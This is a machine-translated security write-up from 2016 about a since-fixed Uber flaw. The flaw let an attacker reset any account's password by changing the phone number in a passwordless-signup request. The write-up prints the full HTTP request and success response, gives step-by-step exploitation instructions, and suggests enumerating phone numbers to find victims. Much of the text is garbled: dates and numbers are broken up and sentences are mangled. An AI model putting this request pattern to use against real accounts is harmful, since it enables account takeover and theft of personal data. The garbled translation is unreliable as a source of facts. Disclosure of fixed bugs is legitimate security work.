Exploit details: change any user of the Uber-password-vulnerability warning-the black bar safety net

ID MYHACK58:62201676975
Type myhack58
Reporter 佚名
Modified 2016-07-16T00:00:00


Vulnerability status: resolved(closed) Disclosure Time: 2 0 1 6 7 1 5 am 5 points 3 8 points Report objects: Uber Vulnerability type: authentication class Bonus: 1 0 0 0 0$ ! Vulnerability overview: Uber is a global instant car software, the software has now covered the global more than sixty countries and three hundred cities. While Uber's main purpose is to provide everyone with a safer, more comfortable way to travel, and to improve urban transport. Security experts found that, by Uber the terminal device in the/rt/users/passwordless-signup, the attacker only needs to know the target Uber user's mobile phone number, you can modify the names of standard user's Uber account password. But in fact, the attacker can continue to enumerate the phone number until generating a registered Uber account phone number. Currently, security research specialists have in Uber's passenger side for a vulnerability test, and found that this vulnerability is likely the same applies to the Uber driver terminal and the other user roles. Request / response: Given below is the client's network request data, the user specific phone number has been used xxxx instead of: POST /rt/users/passwordless-signup HTTP/1.1 Host: cn-geo1.uber.com User-Agent: client/iphone/2.137.1 Connection: close Content-Type: application/json Content-Length: 1 9 7 {"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}} A network request corresponding to the server response information is as follows:

{"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password."," userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"} The exploit procedure: First, we need to create a new Uber passenger account. In the course of the experiment, security researchers are using the iOS side application, but this vulnerability is not limited to the application platform of influence. After successful registration, the above network request is again sent to Uber's servers, but need to before sending the“phoneNumberE164”modify the value of the binding account, phone numbers phone numbers need to include the National number prefix, and“+”at the beginning. For example, the American mobile phone number prefix code is+1xxx to. In some cases, you may need to repeat the transmission twice in such a network request, otherwise you may not be receiving the server sends back the response information. In the end, we will receive a content of“the new password has been created”message, this also means that we have successfully update the target account's login password. And the target account's new password is in the request,“newPassword”domain value. As a result, we can in the http://riders. uber. com/or elsewhere use the new password to login to this account. Prior to that, Uber has always been hackers often choose targets. Back in 2 0 1 4 years, Uber the company on the occurrence of a serious data leak. In this event, there are about five million Uber taxi driver's name and driver's license information stolen. In addition, in 2 0 1 6 first half of the year, the Uber platform a large number the account information should appear in the dark web market, a large number of user information is a leak. To this end, the Uber company technician should really check out their product safety.